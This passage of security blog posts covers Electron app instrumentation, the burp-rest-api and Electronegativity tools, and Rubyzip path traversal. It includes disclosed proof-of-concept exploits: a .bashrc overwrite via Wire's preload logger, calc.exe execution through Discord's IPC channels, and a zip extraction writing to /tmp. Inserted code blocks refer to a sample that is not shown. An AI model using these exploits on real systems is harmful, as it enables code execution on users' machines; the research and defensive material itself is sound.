webview tags).

```javascript
window.document.getElementsByTagName("webview")[0].openDevTools()
```

While reading the code above, have you noticed the webPreferences options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the *show* property of WebPreferences:

`BrowserWindow({show: true})`

### Adding debugging statements

During instrumentation, it is useful to include debugging code such as

```javascript
console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")
```

### Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium's Developer Tools can be used to debug Electron's main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process, you will need to leverage the native debugger and launch Electron with the `--inspect` or `--inspect-brk` switch.

Use one of the following command line switches to enable debugging of the main process:

*--inspect=[port]* Electron will listen for V8 inspector protocol messages on the specified port; an external debugger will need to connect on this port. The default port is 5858.

*--inspect-brk=[port]* Like --inspect, but pauses execution on the first line of JavaScript.

Usage: `electron --inspect=5858 your-app`

You can now connect Chrome by visiting *chrome://inspect* and analyze the launched Electron app present there.

### Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so set up a proxy and then [add Burp CA](https://portswigger.net/burp/help/proxy_options_installingcacert) as usual.

We can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

```
--proxy-server=address:port
```

Or, programmatically with these lines in the main app:

```javascript
const {app} = require('electron')
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')
```

For Node, use transparent proxying by either changing */etc/hosts* or overriding configs:

```
npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081
```

In case you need to revert the proxy settings, use:

```
npm config rm proxy
npm config rm https-proxy
```

However, you need to disable TLS validation with the following code within the application under testing:

`process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";`

### Outro

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

[email protected] @lucacarettoni

### Read more

- https://electronjs.org/docs/api/browser-window
- https://electronjs.org/docs/tutorial/security
- https://electronjs.org/docs/tutorial/application-architecture
- https://electronjs.org/docs/tutorial/application-debugging
- https://electronjs.org/docs/tutorial/security#checklist-security-recommendations
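As an added example (not code from the original post), the `eval(function(c,d,e,f,g,h){...})` sample shown earlier can be unpacked statically, without ever running it: the wrapper's own decode loop is re-implemented so that it returns the reconstructed source instead of handing it to `eval`, and the `\xNN` escapes that the keyword table reintroduces are then resolved so the string literals become readable. The packed string, base, count and keyword list are copied from the sample on the page; the function names and the `SAMPLE` object are ours.

```javascript
// Static unpacker for the packer-style "eval(function(c,d,e,f,g,h){...})"
// sample discussed above. Added example, not code from the original post.
// The decode loop is the same as the wrapper's, but the result is returned
// as a string instead of being eval()'d, so analysis never executes the
// untrusted code.

// Arguments copied from the packed sample on the page (the object layout
// and its name are ours).
const SAMPLE = {
  packed: 'b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d",' +
    '"\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];' +
    '9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])',
  base: 40,
  count: 40,
  keywords: ('||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|' +
    'this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|' +
    'return|new|x2E|x77|x63|SayHello').split('|'),
};

// Token n is rendered in the packer's base: 0-9a-z for 0..35, then A, B, ...
// (this is the inner "g" function of the wrapper).
function encodeToken(n, base) {
  const prefix = n < base ? '' : encodeToken(Math.floor(n / base), base);
  const digit = n % base;
  return prefix + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Walk the keyword table from the highest index down, swapping each
// whole-word token for its keyword. Same loop as the wrapper, minus eval.
function unpackPacker({ packed, base, count, keywords }) {
  let source = packed;
  for (let n = count - 1; n >= 0; n--) {
    if (!keywords[n]) continue;
    const token = new RegExp('\\b' + encodeToken(n, base) + '\\b', 'g');
    source = source.replace(token, keywords[n]);
  }
  return source;
}

// The unpacked code still hides its strings as \xNN escapes; turn them into
// plain characters so the literals are readable without running the code.
function resolveHexEscapes(source) {
  return source.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Pull out the double-quoted string literals of the readable source; these
// are usually what an analyst wants to see first (messages, API names, URLs).
function extractStringLiterals(source) {
  const literals = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(source)) !== null) literals.push(m[1]);
  return literals;
}

// Full pipeline: unpack, then resolve escapes.
function deobfuscate(sample) {
  return resolveHexEscapes(unpackPacker(sample));
}

// Stand-alone run: print the recovered source and its string literals.
if (typeof require !== 'undefined' && require.main === module) {
  const readable = deobfuscate(SAMPLE);
  console.log(readable);
  console.log(extractStringLiterals(readable));
}
```

The recovered source is the same code JStillery/JS Nice produced above, minus the pretty-printing and the guessed parameter names.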

Introducing burp-rest-api v2

4 November 2018 at 23:00
Since the first commit back in 2016, [burp-rest-api](https://github.com/vmware/burp-rest-api/) has been the default tool for *BurpSuite-powered* web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we're proud to announce a new major release of the tool: **burp-rest-api v2.0.1**

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately, internal security tools are rarely open-sourced, and still too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation, as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

### Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it's actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren't able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having *burpsuite_pro.jar*.

```bash
git clone git@github.com:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build
```

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

```bash
java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar
```

### Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension, which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag `--burp.ext=<filename.{jar,rb,py}>`.

In order to implement this, we employed a classloading technique with a dummy entry point (*BurpExtender.java*) that loads the legacy Burp extension (*LegacyBurpExtension.java*) after the full Burp Suite has been loaded and launched (*BurpService.java*).

### Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

- Better documentation and even a FAQs page
- Burp Spider status API
- Burp Configuration with configPath selection API
- Enabled SpringBoot compression
- Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
- ...and [much more](https://github.com/vmware/burp-rest-api/issues?q=is%3Aissue+is%3Aclosed)

### Help Us Shape The Future of burp-rest-api

With the release of [Burp Suite Professional 2.0 (beta)](https://portswigger.net/blog/burp-suite-2-0-beta-now-available), Burp includes a [native Rest API](https://portswigger.net/blog/burps-new-rest-api).

While the current functionalities are very limited, this is certainly going to change.

> In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It's great that Burp users will finally benefit from a native Rest API; however, this new feature makes us wonder about the future of this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this [Github Issue](https://github.com/vmware/burp-rest-api/issues/75) or tweet to our Twitter account.

Thank you for the support,

[Luca Carettoni](https://github.com/ikkisoft) & [Andrea Brancaleoni](https://github.com/thypon)

Electronegativity is finally out!

23 January 2019 at 23:00
We're excited to announce the public release of [Electronegativity](https://github.com/doyensec/electronegativity), an opensource tool capable of identifying misconfigurations and security anti-patterns in [Electron](https://electronjs.org/)-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you're simply interested in trying out Electronegativity, go ahead and install it using NPM:

```bash
$ npm install @doyensec/electronegativity -g
```

To review your application, use the following command:

```bash
$ electronegativity -i /path/to/electron/app
```

Results are displayed in a compact table, with references to application files and our knowledge-base.

![Electronegativity Demo](../../../public/images/electronegativity.png)

The remaining blog post will provide more details on the public release and introduce its current features.

### A bit of history

Back in July 2017 at the [BlackHat USA Briefings](https://www.blackhat.com/us-17/), we presented the [first comprehensive study on Electron security](https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf) where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a [checklist of security anti-patterns](https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, [Claudio Merloni](https://github.com/p4p3r) and I started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec's first intern - [Ibram Marzouk](https://github.com/0xibram), who started working on the tool again. Later, [Jaroslav Lobacevski](https://github.com/JarLob) joined the project team and pushed Electronegativity to the finish line. *Claudio*, *Ibram* and *Jaroslav*, thanks for your contributions!

While certainly overdue, we're happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

### How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

[Building a new check](https://github.com/doyensec/electronegativity/blob/master/CONTRIBUTING.md) is relatively easy too. We support three "families" of checks, so that the tool can analyze all resources within an Electron application:

- JS (using a combination of [Esprima](http://esprima.org/), [Babel](https://github.com/babel/babel), [TypeScript ESTree](https://github.com/JamesHenry/typescript-estree))
- HTML (using [Cheerio](https://github.com/cheeriojs/cheerio))
- JSON (using the native `JSON.parse()`)

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

#### Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

1. [ALLOWPOPUPS_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/ALLOWPOPUPS_HTML_CHECK)
2. [AUXCLICK_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/AUXCLICK_JS_CHECK)
3. [AUXCLICK_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/AUXCLICK_HTML_CHECK)
4. [BLINK_FEATURES_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/BLINK_FEATURES_JS_CHECK)
5. [BLINK_FEATURES_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/BLINK_FEATURES_HTML_CHECK)
6. [CERTIFICATE_ERROR_EVENT_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/CERTIFICATE_ERROR_EVENT_JS_CHECK)
7. [CERTIFICATE_VERIFY_PROC_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/CERTIFICATE_VERIFY_PROC_JS_CHECK)
8. [CONTEXT_ISOLATION_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/CONTEXT_ISOLATION_JS_CHECK)
9. [CUSTOM_ARGUMENTS_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/CUSTOM_ARGUMENTS_JS_CHECK)
10. [DANGEROUS_FUNCTIONS_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/DANGEROUS_FUNCTIONS_JS_CHECK)
11. [ELECTRON_VERSION_JSON_CHECK](https://github.com/doyensec/electronegativity/wiki/ELECTRON_VERSION_JSON_CHECK)
12. [EXPERIMENTAL_FEATURES_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/EXPERIMENTAL_FEATURES_HTML_CHECK)
13. [EXPERIMENTAL_FEATURES_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/EXPERIMENTAL_FEATURES_JS_CHECK)
14. [HTTP_RESOURCES_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/HTTP_RESOURCES_JS_CHECK)
15. [HTTP_RESOURCES_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/HTTP_RESOURCES_HTML_CHECK)
16. [INSECURE_CONTENT_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/INSECURE_CONTENT_HTML_CHECK)
17. [INSECURE_CONTENT_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/INSECURE_CONTENT_JS_CHECK)
18. [NODE_INTEGRATION_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_HTML_CHECK)
19. [NODE_INTEGRATION_EVENT_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_ATTACH_EVENT_JS_CHECK)
20. [NODE_INTEGRATION_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/NODE_INTEGRATION_JS_CHECK)
21. [OPEN_EXTERNAL_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/OPEN_EXTERNAL_JS_CHECK)
22. [PERMISSION_REQUEST_HANDLER_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/PERMISSION_REQUEST_HANDLER_JS_CHECK)
23. [PRELOAD_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/PRELOAD_JS_CHECK)
24. [PROTOCOL_HANDLER_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/PROTOCOL_HANDLER_JS_CHECK)
25. [SANDBOX_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/SANDBOX_JS_CHECK)
26. [WEB_SECURITY_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/WEB_SECURITY_HTML_CHECK)
27. [WEB_SECURITY_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/WEB_SECURITY_JS_CHECK)

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. **Start using [Electronegativity](https://github.com/doyensec/electronegativity) today!**

Subverting Electron Apps via Insecure Preload

2 April 2019 at 22:00
We're back from [BlackHat Asia 2019](https://www.blackhat.com/asia-19/briefings/schedule/index.html#preloading-insecurity-in-your-electron-13756) where we introduced a relatively unexplored class of vulnerabilities affecting [Electron-based](https://electronjs.org/) applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn't child's play anymore.

![From Alert to Calc](../../../public/images/xss2rce.png)

BrowserWindow [preload](https://electronjs.org/docs/all#preload) introduces a new and interesting attack vector. Even without a framework bug (e.g. `nodeIntegration` bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

> You can download the slides of our talk from the official BlackHat Briefings archive: [http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf](http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf)

### Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page's `window` object, as shown in the official documentation:

```javascript
const { app, BrowserWindow } = require('electron')

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})
```

*preload.js* can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

```javascript
const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen
[...]
```

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended [security best practices](https://electronjs.org/docs/tutorial/security), we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of **insecure preloads**:

- **(1) Preload scripts can reintroduce *Node* global symbols back to the global scope**

  While it is evident that reintroducing some Node global symbols (e.g. `process`) to the renderer is dangerous, the risk is not immediately obvious for classes like `Buffer` (which can be leveraged for a `nodeIntegration` bypass)

- **(2) Preload scripts can introduce functionalities that can be abused by untrusted code**

  Preload scripts have access to Node.js, and the functions exported by applications to the global `window` often include dangerous primitives

- **(3) Preload scripts can facilitate `sandbox` bypasses**

  Even with `sandbox` enabled, preload scripts still have access to Node.js native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate `sandbox` bypasses

- **(4) Without `contextIsolation`, the integrity of preload scripts is not guaranteed**

  When isolated worlds are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: [Wire App](https://wire.com/) and [Discord](https://discordapp.com/).

For more vulnerabilities and examples, please refer to our presentation.

### WireApp Desktop Arbitrary File Write via Insecure Preload

[Wire App](https://wire.com/) is a self-proclaimed *"most secure collaboration platform"*. It's a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a `BrowserWindow` with `nodeIntegration` disabled, in which a [webview](https://electronjs.org/docs/api/webview-tag) HTML tag is used.

![Wire App frames](../../../public/images/wiredesign.png)

Despite enforcing isolation, the `web-view-preload.js` preload file contains the following code:

```javascript
const webViewLogger = new winston.Logger();
webViewLogger.add(winston.transports.File, {
  filename: logFilePath,
  handleExceptions: true,
});
webViewLogger.info(config.NAME, 'Version', config.VERSION);

// webapp uses global winston reference to define log level
global.winston = webViewLogger;
```

Code running in the isolated renderer (e.g. XSS) can override the logger's transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

```javascript
window.document.getElementsByTagName("webview")[0].openDevTools();
```

Before executing the following code:

```javascript
function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
  dirname: '/home/ikki/',
  level: 'error',
  filename: '.bashrc',
  json: false,
  formatter: formatme
}))

winston.error('xcalc &');
```

[Video: Wire App demo (../../../public/images/wiredemo.mp4, poster ../../../public/images/wireappvuln.png)]

This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on [March 14, 2019](https://medium.com/wire-news/windows-3-7-2904-52c56b1113af), just a few days after our disclosure.

### Discord Desktop Arbitrary IPC via Insecure Preload

[Discord](https://discordapp.com/) is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a `BrowserWindow` with `nodeIntegration` disabled. Despite that, the preload script (*app/mainScreenPreload.js*) in use by the same `BrowserWindow` contains multiple exports, including the following:

```javascript
var DiscordNative = {
  isRenderer: process.type === 'renderer',
  //..
  ipc: require('./discord_native/ipc'),
};

//..
process.once('loaded', function () {
  global.DiscordNative = DiscordNative;
  //..
});
```

where *app/discord_native/ipc.js* contains the following code:

```javascript
var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }
  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = { send: send, on: on };
```

Without going into details, this script is basically a wrapper for the official Electron [asynchronous IPC mechanism](https://electronjs.org/docs/api/ipc-renderer#ipcrenderersendchannel-arg1-arg2-) used to exchange messages from the render process (web page) to the main process.

In Electron, the `ipcMain` and `ipcRenderer` modules are used to implement IPC between the main process and the renderers, but they're also leveraged for internal native framework invocations. For instance, the `window.close()` function is implemented using the following event listener:

```javascript
// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})
```

As there's no separation between application-level IPC messages and the `ELECTRON_` internal channels, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework's security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

```javascript
(function () {
  var ipcRenderer = require('electron').ipcRenderer
  var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE", "electron");
  var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
  return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
    type: 'value',
    value: "file:///Applications/Calculator.app"
  }]);
})();
```

In the case of Discord's preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference to the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of `child_process` using the following code:

```javascript
DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE", "child_process");
for (var i = 0; i < 50; i++) {
  DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
    type: 'value',
    value: "calc.exe"
  }]);
}
```

[Video: Discord demo (../../../public/images/discorddemoipc.mp4, poster ../../../public/images/discordvuln.png)]

This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.
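As an added example (not Discord's, Wire's or Electron's code), the wrapper below keeps the convenience of a preload-exposed `send`/`on` pair but restricts it to an allowlist of application channels, so page code cannot reach the `ELECTRON_*` internal channels that the arbitrary-channel wrapper above hands out. The `makeFakeIpcRenderer` stand-in is constructed so the block runs outside Electron, and the channel names in `demo()` are invented.

```javascript
// Added example: an allowlisting preload IPC wrapper. Compare discord_native/ipc.js
// on this page, which forwards any channel name straight to ipcRenderer.send.

// Framework-internal channels share this prefix (see ELECTRON_BROWSER_* above).
const INTERNAL_CHANNEL_PREFIX = 'ELECTRON_';

// Capture the primitives the check relies on at preload time. Without
// contextIsolation the page shares this JS realm and could replace
// Set.prototype.has or String.prototype.startsWith (insecure preload type 4).
// Calling captured originals narrows that window; contextIsolation is the real fix.
const setHas = Function.prototype.call.bind(Set.prototype.has);
const startsWith = Function.prototype.call.bind(String.prototype.startsWith);
const toUpperCase = Function.prototype.call.bind(String.prototype.toUpperCase);

// True only for a string channel that is on the allowlist and does not sit in
// the framework's internal namespace (checked case-insensitively).
function isAllowedChannel(channel, allowedSet) {
  if (typeof channel !== 'string') return false;
  if (startsWith(toUpperCase(channel), INTERNAL_CHANNEL_PREFIX)) return false;
  return setHas(allowedSet, channel);
}

// Builds the object a preload script would expose to the page. ipcRenderer is
// injected so the wrapper can be exercised with a fake outside Electron.
function createSafeIpc(ipcRenderer, allowedChannels) {
  const allowed = new Set(allowedChannels);
  const api = {
    // Forward an application message; throws rather than silently dropping so
    // mistakes in legitimate callers surface during development.
    send(channel, ...args) {
      if (!isAllowedChannel(channel, allowed)) {
        throw new Error('ipc: channel not allowed: ' + String(channel));
      }
      ipcRenderer.send(channel, ...args);
      return true;
    },
    // Subscribe to an allowlisted channel. The event object is deliberately not
    // passed through: handing it to page code would leak the framework's sender.
    on(channel, callback) {
      if (!isAllowedChannel(channel, allowed)) {
        throw new Error('ipc: channel not allowed: ' + String(channel));
      }
      ipcRenderer.on(channel, (_event, ...args) => callback(...args));
      return true;
    },
  };
  // Frozen so page code cannot reassign send/on on the exposed object.
  return Object.freeze(api);
}

// Constructed stand-in for electron.ipcRenderer that records what would cross
// the process boundary and can replay messages from the "main process" side.
function makeFakeIpcRenderer() {
  const sent = [];
  const listeners = {};
  return {
    sent,
    send(channel, ...args) { sent.push([channel, ...args]); },
    on(channel, listener) { (listeners[channel] = listeners[channel] || []).push(listener); },
    emit(channel, ...args) { (listeners[channel] || []).forEach((l) => l({ sender: this }, ...args)); },
  };
}

// Exercise the wrapper the way page code would and report what reached the fake.
function demo() {
  const fake = makeFakeIpcRenderer();
  const ipc = createSafeIpc(fake, ['blocked-popup-notification', 'app:badge-count']);
  const rejected = [];
  // Internal channel, case-variant internal channel, unregistered name, non-string.
  for (const channel of ['ELECTRON_BROWSER_REQUIRE', 'electron_browser_member_call', 'not-registered', 42]) {
    try { ipc.send(channel, 'x'); } catch (e) { rejected.push(String(channel)); }
  }
  ipc.send('app:badge-count', 3);
  let received = null;
  ipc.on('app:badge-count', (n) => { received = n; });
  fake.emit('app:badge-count', 7);
  return { forwarded: fake.sent, rejected, received };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo()));
}
```

Only the one allowlisted message reaches the fake `ipcRenderer`; the four other sends are refused before any channel name crosses the boundary, and the subscriber sees the payload without the event object.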

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

23 April 2019 at 22:00
During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the [Rubyzip](https://github.com/Rubyzip/Rubyzip) gem. Zip files have always been an interesting entry point for triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under test had symlink processing disabled, we focused on path traversal exploitation.

**This blog post discusses our results, the "bug" discovered in the library itself and the implication of such an issue in a popular piece of software: [Metasploit](https://blog.rapid7.com/2019/04/19/metasploit-wrap-up-13/).**

---

## Rubyzip and old vulnerabilities

The *Rubyzip* gem has a long history of path traversal vulnerabilities ([1](https://github.com/Rubyzip/Rubyzip/issues/315), [2](https://github.com/Rubyzip/Rubyzip/issues/369)) through malicious filenames. Particularly interesting was the code change in PR [#376](https://github.com/Rubyzip/Rubyzip/pull/376), where a different handling was implemented by the developers.

```rb
# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe,
# if it is passed.
def extract(dest_path = nil, &block)
  if dest_path.nil? && !name_safe?
    puts "WARNING: skipped #{@name} as unsafe"
    return self
  end

  [...]
```

`Entry#name_safe` is defined [a few lines before](https://github.com/Rubyzip/Rubyzip/blob/master/lib/zip/entry.rb#L112) as:

```rb
# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
  cleanpath = Pathname.new(@name).cleanpath
  return false unless cleanpath.relative?
  root = ::File::SEPARATOR
  naive_expanded_path = ::File.join(root, cleanpath.to_s)
  cleanpath.expand_path(root).to_s == naive_expanded_path
end
```

In the code above, if the destination path is passed to the `Entry#extract` function then it is not actually checked.
A [comment](https://github.com/Rubyzip/Rubyzip/blob/master/lib/zip/entry.rb#L160) in the source code of that function highlights the user's responsibility:

> # NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While `Entry#name_safe` is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) [evilarc](https://github.com/ptoomey3/evilarc), and extracted the malicious file using the following code:

```rb
require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
```

```sh
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt
```

This results in a file being created in */tmp/file.txt*, which confirms the issue.

As happened with our client, most developers might have upgraded to [Rubyzip 1.2.2](https://nvd.nist.gov/vuln/detail/CVE-2018-1000544) thinking it was safe to use, without actually verifying how the library works or its specific usage in the codebase.

## It would have been vulnerable anyway `¯\_(ツ)_/¯`

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

```rb
def unzip(input)
  uuid = get_uuid()
  # 0. create a 'Pathname' object with the new uuid
  parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")
  Zip::File.open(input[:zip_file].to_io) do |zip_file|
    zip_file.each_with_index do |entry, index|
      # 1. check the file is not present
      next if File.file?(parent_directory + entry.name)
      # 2. extract the entry
      entry.extract(parent_directory + entry.name)
    end
  end
  Success
end
```

In item #0 we can see that a `Pathname` object is created and then used as the destination path of the decompressed entry in item #2.
However, the sum operator between `Pathname` objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

```sh
$ irb
irb(main):001:0> require 'pathname'
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
